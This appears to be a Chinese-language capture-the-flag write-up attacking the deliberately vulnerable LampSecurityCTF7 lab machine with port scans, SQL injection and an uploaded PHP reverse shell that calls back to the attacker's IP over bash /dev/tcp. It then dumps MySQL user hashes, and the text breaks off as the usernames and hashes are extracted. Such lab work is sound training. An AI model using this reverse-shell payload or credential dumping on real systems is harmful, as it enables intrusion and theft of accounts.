LampSecurityCTF7 靶机渗透 (sql 注入, 文件上传, 密码喷射)

news/2024/12/21 20:21:55/

靶机介绍

LampSecurityCTF7,vulnhub 靶机

主机发现

由于靶机配置问题,扫不到 ip

这里需要特别注意一下,在第一次启动打开靶机的时候,vmware会跳出一个提示框,让你选择我已复制该虚拟机/我已移动该虚拟机,一定要选择移动,用移动的方式网络环境会完整复现。否则有可能在主机发现的时候扫描不到这个靶机。如果后续发现真的出现了无法主机发现,莫慌,重装一下就行了。
(https://blog.csdn.net/Bossfrank/article/details/131324929)

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sn 192.168.50.0/24
[sudo] password for kali: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-27 10:32 CST
Nmap scan report for 192.168.50.1
Host is up (0.00016s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.50.134
Host is up (0.00011s latency).
MAC Address: 00:0C:29:83:4F:85 (VMware)
Nmap scan report for 192.168.50.156
Host is up (0.000081s latency).
MAC Address: 00:0C:29:9D:12:A9 (VMware)
Nmap scan report for 192.168.50.254
Host is up (0.00013s latency).
MAC Address: 00:50:56:EC:05:7B (VMware)
Nmap scan report for 192.168.50.147
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 27.90 seconds
┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.50.156                                       
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-27 10:42 CST
Nmap scan report for bogon (192.168.50.156)
Host is up (0.00044s latency).
Not shown: 65505 filtered tcp ports (no-response), 21 filtered tcp ports (host-prohibited)
PORT      STATE  SERVICE
22/tcp    open   ssh
80/tcp    open   http
137/tcp   closed netbios-ns
138/tcp   closed netbios-dgm
139/tcp   open   netbios-ssn
901/tcp   open   samba-swat
5900/tcp  closed vnc
8080/tcp  open   http-proxy
10000/tcp open   snet-sensor-mgmt
MAC Address: 00:0C:29:9D:12:A9 (VMware)Nmap done: 1 IP address (1 host up) scanned in 13.41 seconds┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -O -p22,80,137,138,139,901,5900,8080,10000 192.168.50.156      
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-27 10:46 CST
Nmap scan report for bogon (192.168.50.156)
Host is up (0.00042s latency).PORT      STATE  SERVICE     VERSION
22/tcp    open   ssh         OpenSSH 5.3 (protocol 2.0)
80/tcp    open   http        Apache httpd 2.2.15 ((CentOS))
137/tcp   closed netbios-ns
138/tcp   closed netbios-dgm
139/tcp   open   netbios-ssn Samba smbd 3.X - 4.X (workgroup: MYGROUP)
901/tcp   open   http        Samba SWAT administration server
5900/tcp  closed vnc
8080/tcp  open   http        Apache httpd 2.2.15 ((CentOS))
10000/tcp open   http        MiniServ 1.610 (Webmin httpd)
MAC Address: 00:0C:29:9D:12:A9 (VMware)
Aggressive OS guesses: Linux 2.6.32 - 3.13 (97%), Linux 2.6.39 (96%), Linux 2.6.32 - 3.10 (94%), Linux 2.6.32 (92%), Linux 3.2 - 3.8 (92%), Linux 2.6.22 - 2.6.36 (91%), Linux 3.10 - 4.11 (91%), Tandberg Video Conference System (91%), Linux 2.6.32 - 3.1 (91%), Linux 2.6.32 - 2.6.39 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hopOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.89 seconds┌──(kali㉿kali)-[~]
└─$ sudo nmap -sU --min-rate 1000 -p- 192.168.50.156                           
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-27 10:49 CST
Warning: 192.168.50.156 giving up on port because retransmission cap hit (10).
Nmap scan report for bogon (192.168.50.156)
Host is up (0.00039s latency).
All 65535 scanned ports on bogon (192.168.50.156) are in ignored states.
Not shown: 64800 open|filtered udp ports (no-response), 735 filtered udp ports (host-prohibited)
MAC Address: 00:0C:29:9D:12:A9 (VMware)Nmap done: 1 IP address (1 host up) scanned in 719.01 seconds

漏洞脚本扫描(扫描很慢,不知道为啥)

┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p22,80,137,138,139,901,5900,8080,10000 192.168.50.156
[sudo] password for kali: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-27 11:32 CST
Stats: 0:26:52 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 96.80% done; ETC: 12:00 (0:00:53 remaining)
Stats: 0:35:53 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 97.34% done; ETC: 12:09 (0:00:59 remaining)
Stats: 0:43:13 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.22% done; ETC: 12:16 (0:00:47 remaining)
Nmap scan report for bogon (192.168.50.156)
Host is up (0.00030s latency).PORT      STATE  SERVICE
22/tcp    open   ssh
80/tcp    open   http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-fileupload-exploiter: 
|   
|     Couldn't find a file-type field.
|   
|_    Couldn't find a file-type field.
|_http-trace: TRACE is enabled
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-phpself-xss: ERROR: Script execution failed (use -d to debug)
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
137/tcp   closed netbios-ns
138/tcp   closed netbios-dgm
139/tcp   open   netbios-ssn
901/tcp   open   samba-swat
5900/tcp  closed vnc
8080/tcp  open   http-proxy
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-trace: TRACE is enabled
| http-enum: 
|_  /login.php: Possible admin folder
10000/tcp open   snet-sensor-mgmt
MAC Address: 00:0C:29:9D:12:A9 (VMware)Host script results:
|_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)
| smb-vuln-cve2009-3103: 
|   VULNERABLE:
|   SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2009-3103
|           Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
|           Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
|           denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
|           PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
|           aka "SMBv2 Negotiation Vulnerability."
|           
|     Disclosure date: 2009-09-08
|     References:
|       http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_smb-vuln-ms06-025: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-ms10-061: false
|_samba-vuln-cve-2012-1182: SMB: Failed to receive bytes: EOF
|_smb-vuln-ms10-054: falseNmap done: 1 IP address (1 host up) scanned in 3316.13 seconds

web 渗透

在这里插入图片描述注入试试
在这里插入图片描述
8080 端口尝试注一下,没能成,似乎是数据库版本的注释有点问题,有报错信息,可以看一下
在这里插入图片描述这样注入能成
在这里插入图片描述有上传,考虑传个马

在这里插入图片描述

┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ vim shell.php    ┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ cat shell.php          
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.50.147/1234 0>&1'"); ?>

下一步找 shell.php 的位置,让他向 kali 弹 shell
扫目录,其中 asset 中看到上传文件

┌──(kali㉿kali)-[~]
└─$ sudo dirb http://192.168.50.156/                                              
[sudo] password for kali: -----------------
DIRB v2.22    
By The Dark Raver
-----------------START_TIME: Fri Sep 27 13:54:34 2024
URL_BASE: http://192.168.50.156/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt-----------------GENERATED WORDS: 4612                                                          ---- Scanning URL: http://192.168.50.156/ ----
+ http://192.168.50.156/about (CODE:200|SIZE:4910)                                                                                                        
==> DIRECTORY: http://192.168.50.156/assets/                                                                                                              
+ http://192.168.50.156/backups (CODE:301|SIZE:333)                                                                                                       
+ http://192.168.50.156/cgi-bin/ (CODE:403|SIZE:290)                                                                                                      
+ http://192.168.50.156/contact (CODE:200|SIZE:5017)                                                                                                      
==> DIRECTORY: http://192.168.50.156/css/                                                                                                                 
+ http://192.168.50.156/db (CODE:200|SIZE:3904)                                                                                                           
+ http://192.168.50.156/default (CODE:200|SIZE:6058)                                                                                                      
+ http://192.168.50.156/footer (CODE:200|SIZE:3904)                                                                                                       
+ http://192.168.50.156/header (CODE:200|SIZE:3904)                                                                                                       
==> DIRECTORY: http://192.168.50.156/img/                                                                                                                 
==> DIRECTORY: http://192.168.50.156/inc/                                                                                                                 
+ http://192.168.50.156/index.php (CODE:200|SIZE:6058)                                                                                                    
==> DIRECTORY: http://192.168.50.156/js/                                                                                                                  
+ http://192.168.50.156/newsletter (CODE:200|SIZE:4037)                                                                                                   
+ http://192.168.50.156/phpinfo (CODE:200|SIZE:58734)                                                                                                     
+ http://192.168.50.156/profile (CODE:200|SIZE:3977)                                                                                                      
+ http://192.168.50.156/read (CODE:302|SIZE:1)                                                                                                            
+ http://192.168.50.156/recovery (CODE:200|SIZE:4807)                                                                                                     
+ http://192.168.50.156/register (CODE:200|SIZE:6591)                                                                                                     
+ http://192.168.50.156/signup (CODE:200|SIZE:4783)                                                                                                       
+ http://192.168.50.156/usage (CODE:403|SIZE:287)                                                                                                         
==> DIRECTORY: http://192.168.50.156/webalizer/                                                                                                           
==> DIRECTORY: http://192.168.50.156/webmail/                                                                                                             ---- Entering directory: http://192.168.50.156/assets/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        (Use mode '-w' if you want to scan it anyway)---- Entering directory: http://192.168.50.156/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        (Use mode '-w' if you want to scan it anyway)---- Entering directory: http://192.168.50.156/img/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        (Use mode '-w' if you want to scan it anyway)---- Entering directory: http://192.168.50.156/inc/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        (Use mode '-w' if you want to scan it anyway)---- Entering directory: http://192.168.50.156/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        (Use mode '-w' if you want to scan it anyway)---- Entering directory: http://192.168.50.156/webalizer/ ----
+ http://192.168.50.156/webalizer/index.html (CODE:200|SIZE:3631)                                                                                         ---- Entering directory: http://192.168.50.156/webmail/ ----
+ http://192.168.50.156/webmail/bin (CODE:403|SIZE:293)                                                                                                   
+ http://192.168.50.156/webmail/config (CODE:403|SIZE:296)                                                                                                
+ http://192.168.50.156/webmail/favicon.ico (CODE:200|SIZE:1150)                                                                                          
+ http://192.168.50.156/webmail/index.php (CODE:200|SIZE:5157)                                                                                            
==> DIRECTORY: http://192.168.50.156/webmail/installer/                                                                                                   
+ http://192.168.50.156/webmail/LICENSE (CODE:403|SIZE:297)                                                                                               
+ http://192.168.50.156/webmail/logs (CODE:403|SIZE:294)                                                                                                  
==> DIRECTORY: http://192.168.50.156/webmail/plugins/                                                                                                     
==> DIRECTORY: http://192.168.50.156/webmail/program/                                                                                                     
+ http://192.168.50.156/webmail/README (CODE:403|SIZE:296)                                                                                                
+ http://192.168.50.156/webmail/robots.txt (CODE:200|SIZE:26)                                                                                             
==> DIRECTORY: http://192.168.50.156/webmail/skins/                                                                                                       
+ http://192.168.50.156/webmail/SQL (CODE:403|SIZE:293)                                                                                                   
+ http://192.168.50.156/webmail/temp (CODE:403|SIZE:294)                                                                                                  ---- Entering directory: http://192.168.50.156/webmail/installer/ ----
==> DIRECTORY: http://192.168.50.156/webmail/installer/images/                                                                                            
+ http://192.168.50.156/webmail/installer/index.php (CODE:302|SIZE:0)                                                                                     ---- Entering directory: http://192.168.50.156/webmail/plugins/ ----
==> DIRECTORY: http://192.168.50.156/webmail/plugins/archive/                                                                                             
==> DIRECTORY: http://192.168.50.156/webmail/plugins/emoticons/                                                                                           
==> DIRECTORY: http://192.168.50.156/webmail/plugins/help/                                                                                                
==> DIRECTORY: http://192.168.50.156/webmail/plugins/password/                                                                                            
==> DIRECTORY: http://192.168.50.156/webmail/plugins/userinfo/                                                                                            ---- Entering directory: http://192.168.50.156/webmail/program/ ----
(!) WARNING: All responses for this directory seem to be CODE = 403.                                                                                      (Use mode '-w' if you want to scan it anyway)---- Entering directory: http://192.168.50.156/webmail/skins/ ----
==> DIRECTORY: http://192.168.50.156/webmail/skins/classic/                                                                                               ---- Entering directory: http://192.168.50.156/webmail/installer/images/ -------- Entering directory: http://192.168.50.156/webmail/plugins/archive/ ----
==> DIRECTORY: http://192.168.50.156/webmail/plugins/archive/skins/                                                                                       ---- Entering directory: http://192.168.50.156/webmail/plugins/emoticons/ -------- Entering directory: http://192.168.50.156/webmail/plugins/help/ ----
==> DIRECTORY: http://192.168.50.156/webmail/plugins/help/content/                                                                                        
==> DIRECTORY: http://192.168.50.156/webmail/plugins/help/skins/                                                                                          ---- Entering directory: http://192.168.50.156/webmail/plugins/password/ ----
==> DIRECTORY: http://192.168.50.156/webmail/plugins/password/drivers/                                                                                    
==> DIRECTORY: http://192.168.50.156/webmail/plugins/password/helpers/                                                                                    
+ http://192.168.50.156/webmail/plugins/password/README (CODE:200|SIZE:10645)                                                                             ---- Entering directory: http://192.168.50.156/webmail/plugins/userinfo/ -------- Entering directory: http://192.168.50.156/webmail/skins/classic/ ----
==> DIRECTORY: http://192.168.50.156/webmail/skins/classic/images/                                                                                        
==> DIRECTORY: http://192.168.50.156/webmail/skins/classic/includes/                                                                                      
+ http://192.168.50.156/webmail/skins/classic/README (CODE:200|SIZE:855)                                                                                  
==> DIRECTORY: http://192.168.50.156/webmail/skins/classic/templates/                                                                                     ---- Entering directory: http://192.168.50.156/webmail/plugins/archive/skins/ ----
==> DIRECTORY: http://192.168.50.156/webmail/plugins/archive/skins/classic/                                                                               ---- Entering directory: http://192.168.50.156/webmail/plugins/help/content/ -------- Entering directory: http://192.168.50.156/webmail/plugins/help/skins/ ----
==> DIRECTORY: http://192.168.50.156/webmail/plugins/help/skins/classic/                                                                                  ---- Entering directory: http://192.168.50.156/webmail/plugins/password/drivers/ -------- Entering directory: http://192.168.50.156/webmail/plugins/password/helpers/ -------- Entering directory: http://192.168.50.156/webmail/skins/classic/images/ ----
==> DIRECTORY: http://192.168.50.156/webmail/skins/classic/images/buttons/                                                                                
==> DIRECTORY: http://192.168.50.156/webmail/skins/classic/images/display/                                                                                
+ http://192.168.50.156/webmail/skins/classic/images/favicon.ico (CODE:200|SIZE:1150)                                                                     
==> DIRECTORY: http://192.168.50.156/webmail/skins/classic/images/icons/                                                                                  ---- Entering directory: http://192.168.50.156/webmail/skins/classic/includes/ -------- Entering directory: http://192.168.50.156/webmail/skins/classic/templates/ -------- Entering directory: http://192.168.50.156/webmail/plugins/archive/skins/classic/ -------- Entering directory: http://192.168.50.156/webmail/plugins/help/skins/classic/ ----
==> DIRECTORY: http://192.168.50.156/webmail/plugins/help/skins/classic/templates/                                                                        ---- Entering directory: http://192.168.50.156/webmail/skins/classic/images/buttons/ -------- Entering directory: http://192.168.50.156/webmail/skins/classic/images/display/ -------- Entering directory: http://192.168.50.156/webmail/skins/classic/images/icons/ -------- Entering directory: http://192.168.50.156/webmail/plugins/help/skins/classic/templates/ ----/zt                                                                        
-----------------
END_TIME: Fri Sep 27 13:59:21 2024
DOWNLOADED: 124624 - FOUND: 32

点击 shell.php ,发现服务器可以解析,服务器执行php,kali 拿到 shell
在这里插入图片描述

初级 shell

看一下基础信息

bash-4.1$ sudo -l
sudo -l
sudo: sorry, you must have a tty to run sudo
bash-4.1$ dpkg -l
dpkg -l
bash: dpkg: command not found
bash-4.1$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00inet 127.0.0.1/8 scope host loinet6 ::1/128 scope host valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN qlen 1000link/ether 00:0c:29:9d:12:a9 brd ff:ff:ff:ff:ff:ffinet 192.168.50.156/24 brd 192.168.50.255 scope global eth0inet6 fe80::20c:29ff:fe9d:12a9/64 scope link valid_lft forever preferred_lft forever
bash-4.1$ python --version
python --version
Python 2.6.6
bash-4.1$ uname -a
uname -a
Linux bogon 2.6.32-279.el6.i686 #1 SMP Fri Jun 22 10:59:55 UTC 2012 i686 i686 i386 GNU/Linux
bash-4.1$ whoami
whoami
apache
bash-4.1$ 

使用 python 升级 shell
尝试查看当前用户权限发现需要一个类似凭证的密码,这个密码目前没拿到

bash-4.1$ python -c "import pty;pty.spawn('/bin/bash')"
python -c "import pty;pty.spawn('/bin/bash')"
bash-4.1$ sudo -l
sudo -lWe trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:#1) Respect the privacy of others.#2) Think before you type.#3) With great power comes great responsibility.[sudo] password for apache: exitSorry, try again.
[sudo] password for apache: rootSorry, try again.
[sudo] password for apache: adminSorry, try again.
sudo: 3 incorrect password attempts

搞一搞内网信息收集

bash-4.1$ pwd
pwd
/var/www/html/assets
bash-4.1$ cd /var/www    
cd /var/www
bash-4.1$ ls
ls
admin  cgi-bin  error  html  icons
bash-4.1$ cd admin
cd admin
bash-4.1$ ls
ls
docs          index.php   newsletters.php  reservations.php
feedback.php  login.php   phpmyadmin       trainings.php
inc           logout.php  readings.php     users.php
bash-4.1$ ls -liah
ls -liah
total 68K
260349 drwxrwxr-x. 5 webdev webdev 4.0K Dec 19  2012 .
259983 drwxr-xr-x. 7 root   root   4.0K Dec 19  2012 ..
260460 drwxrwxr-x. 2 webdev webdev 4.0K Dec 11  2012 docs
260476 -rw-rw-r--. 1 webdev webdev 1.5K Dec 24  2012 feedback.php
260436 drwxrwxr-x. 2 webdev webdev 4.0K Dec 11  2012 inc
260351 -rw-r--r--. 1 webdev webdev  314 Dec 24  2012 index.php
260442 -rw-rw-r--. 1 webdev webdev  885 Dec 24  2012 login.php
260445 -rw-rw-r--. 1 webdev webdev  236 Dec 24  2012 logout.php
260472 -rw-rw-r--. 1 webdev webdev 3.8K Dec 24  2012 newsletters.php
270632 drwxr-xr-x. 9 root   root   4.0K Dec 19  2012 phpmyadmin
260471 -rw-rw-r--. 1 webdev webdev 6.5K Dec 24  2012 readings.php
270635 -rw-rw-r--. 1 webdev webdev 2.5K Dec 24  2012 reservations.php
260439 -rw-rw-r--. 1 webdev webdev 5.6K Dec 24  2012 trainings.php
260447 -rw-rw-r--. 1 webdev webdev 4.8K Dec 24  2012 users.php
bash-4.1$ cd inc
cd inc
bash-4.1$ ls
ls
admin_footer.php  admin_header.php  base.php  db.php
bash-4.1$ 

找到了一个数据库连接文件


bash-4.1$ cat db.php
cat db.php
<?php
/*** This file is part of the LAMPSecurity CTF 7* http://sourceforge.net/projects/lampsecurity* by Justin C. Klein Keane*/class DatabaseConnection {public function __construct() {$this->conn = mysql_connect('localhost', 'root', ''); // Change in prodif (!$this->conn) die('Could not connect: ' . mysql_error());mysql_select_db('website');}public function query($query) {$result = mysql_query($query);if (!$result) {$message  = 'Invalid query: ' . mysql_error() . "\n";$message .= 'Whole query: ' . $query;die($message);}$retval = array();while ($row = mysql_fetch_assoc($result)) $retval[] = $row;return $retval;}
}function dbin($string) {return mysql_real_escape_string($string);
}$db = new DatabaseConnection();bash-4.1$ 

登录 mysql (mysql 的操作回显等对 shell 交互性有有要求,连接 shell 后用 python 升级 shell 是一般的操作)

bash-4.1$ python -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
bash-4.1$ mysql -uroot
mysql -uroot
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 88
Server version: 5.1.66 Source distributionCopyright (c) 2000, 2012, Oracle and/or its affiliates. All rights reserved.Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.mysql> 

查看数据库的内容

mysql> mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| roundcube          |
| website            |
+--------------------+
4 rows in set (0.00 sec)mysql> use website
use website
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -ADatabase changed
mysql> show tables;
show tables;
+-------------------+
| Tables_in_website |
+-------------------+
| contact           |
| documents         |
| hits              |
| log               |
| newsletter        |
| payment           |
| trainings         |
| trainings_x_users |
| users             |
+-------------------+
9 rows in set (0.00 sec)mysql>      

看一看 users 表的内容

mysql> select * from users;
select * from users;
+-------------------------------+----------------------------------+----------+---------------------+---------+-----------------+--------------------------------------------------------------------------+
| username                      | password                         | is_admin | last_login          | user_id | realname        | profile                                                                  |
+-------------------------------+----------------------------------+----------+---------------------+---------+-----------------+--------------------------------------------------------------------------+
| brian@localhost.localdomain   | e22f07b17f98e0d9d364584ced0e3c18 |        1 | 2012-12-19 11:30:54 |       3 | Brian Hershel   | Brian is our technical brains behind the operations and a chief trainer. |
| john@localhost.localdomain    | 0d9ff2a4396d6939f80ffe09b1280ee1 |        1 | NULL                |       4 | John Durham     |                                                                          |
| alice@localhost.localdomain   | 2146bf95e8929874fc63d54f50f1d2e3 |        1 | NULL                |       5 | Alice Wonder    |                                                                          |
| ruby@localhost.localdomain    | 9f80ec37f8313728ef3e2f218c79aa23 |        1 | NULL                |       6 | Ruby Spinster   |                                                                          |
| leon@localhost.localdomain    | 5d93ceb70e2bf5daa84ec3d0cd2c731a |        1 | NULL                |       7 | Leon Parnetta   |                                                                          |
| julia@localhost.localdomain   | ed2539fe892d2c52c42a440354e8e3d5 |        1 | NULL                |       8 | Julia Fields    |                                                                          |
| michael@localhost.localdomain | 9c42a1346e333a770904b2a2b37fa7d3 |        0 | NULL                |       9 | Michael Saint   |                                                                          |
| bruce@localhost.localdomain   | 3a24d81c2b9d0d9aaf2f10c6c9757d4e |        0 | NULL                |      10 | Bruce Pottricks |                                                                          |
| neil@localhost.localdomain    | 4773408d5358875b3764db552a29ca61 |        0 | NULL                |      11 | Neil Felstein   |                                                                          |
| charles@localhost.localdomain | b2a97bcecbd9336b98d59d9324dae5cf |        0 | NULL                |      12 | Charles Adams   |                                                                          |
| foo@bar.com                   | 4cb9c8a8048fd02294477fcb1a41191a |        0 | NULL                |      36 |                 |                                                                          |
| test@nowhere.com              | 098f6bcd4621d373cade4e832627b4f6 |        0 | NULL                |     113 |                 |                                                                          |
+-------------------------------+----------------------------------+----------+---------------------+---------+-----------------+--------------------------------------------------------------------------+
12 rows in set (0.00 sec)

破解 md5 的密文


mysql> select username,password from users
select username,password from users-> ;
;
+-------------------------------+----------------------------------+
| username                      | password                         |
+-------------------------------+----------------------------------+
| brian@localhost.localdomain   | e22f07b17f98e0d9d364584ced0e3c18 |
| john@localhost.localdomain    | 0d9ff2a4396d6939f80ffe09b1280ee1 |
| alice@localhost.localdomain   | 2146bf95e8929874fc63d54f50f1d2e3 |
| ruby@localhost.localdomain    | 9f80ec37f8313728ef3e2f218c79aa23 |
| leon@localhost.localdomain    | 5d93ceb70e2bf5daa84ec3d0cd2c731a |
| julia@localhost.localdomain   | ed2539fe892d2c52c42a440354e8e3d5 |
| michael@localhost.localdomain | 9c42a1346e333a770904b2a2b37fa7d3 |
| bruce@localhost.localdomain   | 3a24d81c2b9d0d9aaf2f10c6c9757d4e |
| neil@localhost.localdomain    | 4773408d5358875b3764db552a29ca61 |
| charles@localhost.localdomain | b2a97bcecbd9336b98d59d9324dae5cf |
| foo@bar.com                   | 4cb9c8a8048fd02294477fcb1a41191a |
| test@nowhere.com              | 098f6bcd4621d373cade4e832627b4f6 |
+-------------------------------+----------------------------------+
12 rows in set (0.00 sec)mysql> 

把用户名和密码拿到本机,先拿 awk 处理一下

┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ cat creds.lst  
| brian@localhost.localdomain   | e22f07b17f98e0d9d364584ced0e3c18 |
| john@localhost.localdomain    | 0d9ff2a4396d6939f80ffe09b1280ee1 |
| alice@localhost.localdomain   | 2146bf95e8929874fc63d54f50f1d2e3 |
| ruby@localhost.localdomain    | 9f80ec37f8313728ef3e2f218c79aa23 |
| leon@localhost.localdomain    | 5d93ceb70e2bf5daa84ec3d0cd2c731a |
| julia@localhost.localdomain   | ed2539fe892d2c52c42a440354e8e3d5 |
| michael@localhost.localdomain | 9c42a1346e333a770904b2a2b37fa7d3 |
| bruce@localhost.localdomain   | 3a24d81c2b9d0d9aaf2f10c6c9757d4e |
| neil@localhost.localdomain    | 4773408d5358875b3764db552a29ca61 |
| charles@localhost.localdomain | b2a97bcecbd9336b98d59d9324dae5cf |
| foo@bar.com                   | 4cb9c8a8048fd02294477fcb1a41191a |
| test@nowhere.com              | 098f6bcd4621d373cade4e832627b4f6 |

用 awk 处理一下用户名,写道一个文件里 users.lst (红笔特有的精细操作)

┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ cat creds.lst
| brian@localhost.localdomain   | e22f07b17f98e0d9d364584ced0e3c18 |
| john@localhost.localdomain    | 0d9ff2a4396d6939f80ffe09b1280ee1 |
| alice@localhost.localdomain   | 2146bf95e8929874fc63d54f50f1d2e3 |
| ruby@localhost.localdomain    | 9f80ec37f8313728ef3e2f218c79aa23 |
| leon@localhost.localdomain    | 5d93ceb70e2bf5daa84ec3d0cd2c731a |
| julia@localhost.localdomain   | ed2539fe892d2c52c42a440354e8e3d5 |
| michael@localhost.localdomain | 9c42a1346e333a770904b2a2b37fa7d3 |
| bruce@localhost.localdomain   | 3a24d81c2b9d0d9aaf2f10c6c9757d4e |
| neil@localhost.localdomain    | 4773408d5358875b3764db552a29ca61 |
| charles@localhost.localdomain | b2a97bcecbd9336b98d59d9324dae5cf |
| foo@bar.com                   | 4cb9c8a8048fd02294477fcb1a41191a |
| test@nowhere.com              | 098f6bcd4621d373cade4e832627b4f6 |┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo cat creds.lst | awk -F ' ' '{print $2}'
[sudo] password for kali: 
brian@localhost.localdomain
john@localhost.localdomain
alice@localhost.localdomain
ruby@localhost.localdomain
leon@localhost.localdomain
julia@localhost.localdomain
michael@localhost.localdomain
bruce@localhost.localdomain
neil@localhost.localdomain
charles@localhost.localdomain
foo@bar.com
test@nowhere.com┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo cat creds.lst | awk -F ' ' '{print $2}' | awk -F '@' '{print $1}'
brian
john
alice
ruby
leon
julia
michael
bruce
neil
charles
foo
test┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo cat creds.lst | awk -F ' ' '{print $2}' | awk -F '@' '{print $1}' > users.lst┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ cat users.lst 
brian
john
alice
ruby
leon
julia
michael
bruce
neil
charles
foo
test

把哈希拿出来

┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo cat creds.lst                                                                
| brian@localhost.localdomain   | e22f07b17f98e0d9d364584ced0e3c18 |
| john@localhost.localdomain    | 0d9ff2a4396d6939f80ffe09b1280ee1 |
| alice@localhost.localdomain   | 2146bf95e8929874fc63d54f50f1d2e3 |
| ruby@localhost.localdomain    | 9f80ec37f8313728ef3e2f218c79aa23 |
| leon@localhost.localdomain    | 5d93ceb70e2bf5daa84ec3d0cd2c731a |
| julia@localhost.localdomain   | ed2539fe892d2c52c42a440354e8e3d5 |
| michael@localhost.localdomain | 9c42a1346e333a770904b2a2b37fa7d3 |
| bruce@localhost.localdomain   | 3a24d81c2b9d0d9aaf2f10c6c9757d4e |
| neil@localhost.localdomain    | 4773408d5358875b3764db552a29ca61 |
| charles@localhost.localdomain | b2a97bcecbd9336b98d59d9324dae5cf |
| foo@bar.com                   | 4cb9c8a8048fd02294477fcb1a41191a |
| test@nowhere.com              | 098f6bcd4621d373cade4e832627b4f6 |┌──(kali㉿kali)-[~/testLampSecurityCTF7]
└─$ sudo cat creds.lst | awk -F ' ' '{print $4}'                                      
e22f07b17f98e0d9d364584ced0e3c18
0d9ff2a4396d6939f80ffe09b1280ee1
2146bf95e8929874fc63d54f50f1d2e3
9f80ec37f8313728ef3e2f218c79aa23
5d93ceb70e2bf5daa84ec3d0cd2c731a
ed2539fe892d2c52c42a440354e8e3d5
9c42a1346e333a770904b2a2b37fa7d3
3a24d81c2b9d0d9aaf2f10c6c9757d4e
4773408d5358875b3764db552a29ca61
b2a97bcecbd9336b98d59d9324dae5cf
4cb9c8a8048fd02294477fcb1a41191a
